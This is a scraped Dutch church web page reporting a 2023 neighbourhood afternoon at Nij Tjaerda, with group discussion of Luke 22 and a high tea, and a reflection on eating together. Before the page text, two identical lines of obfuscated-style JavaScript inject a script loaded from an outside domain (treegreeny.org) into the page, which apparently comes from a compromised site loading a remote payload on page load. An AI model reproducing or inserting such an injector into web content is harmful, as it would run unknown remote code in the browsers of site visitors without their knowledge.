;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Leerzame en … erg gezellig wijkmiddag Nij Tjaerda - PKN Damwâld

Leerzame en … erg gezellig wijkmiddag Nij Tjaerda

Gepubliceerd op: dinsdag 14 maart 2023

Maandag 13 maart was er een wijkmiddag voor de bewoners van Nij Tjaerda en omwonenden. Het thema was: Aan tafel !, het jaarthema van de Protestantse Kerk Nederland. Aan de hand van het Bijbelgedeelte Lucas 22: 14-22 werd er in groepjes nagedacht over vragen als “Aan tafel, wat betekent dat voor u ?”, “Wat betekent Pasen voor u”? en “Bij Christus aan tafel is overvloed, wat betekent dat voor u?. Na alle zeer leerzame discussie kon er “aan tafel” genoten worden van een overheerlijke ‘high tea’!

In de Bijbel – maar ook in de kerk – wordt vaak samen gegeten. Gasten worden ruimhartig genodigd, want samen eten schept verbondenheid. Het voedt niet alleen het lichaam, maar ook de ziel. Want terwijl je met elkaar in gesprek bent, ga je elkaar met andere oren horen en met andere ogen zien.

De belangrijkste maaltijd in de Bijbel is de Maaltijd van de Heer. Wie aan de avondmaalstafel deelneemt, gaat aan tafel bij Jezus Christus. Telkens wanneer wij als gemeente de Maaltijd vieren, gedenken wij Jezus’ leven en dood door brood en wijn te ontvangen als zijn lichaam en bloed. Het maakt je tot een ander mens.

‘Eten met een praatje’, het is zo eenvoudig en tegelijk zo bijzonder. Samen aan tafel en genieten van een lekker hapje en elkaars gezelschap, dat wekt een gezonde eetlust op en het zijn vitaminen voor het hart. Want om een prachtig oud Nederlands woord te gebruiken, je laaft je aan een goede maaltijd en aan elkaar. Het is niet voor niets dat in de Bijbel voor Gods toekomst vaak het beeld van een feestmaal wordt gebruikt. Eten met een praatje mag daar een voorproefje van zijn.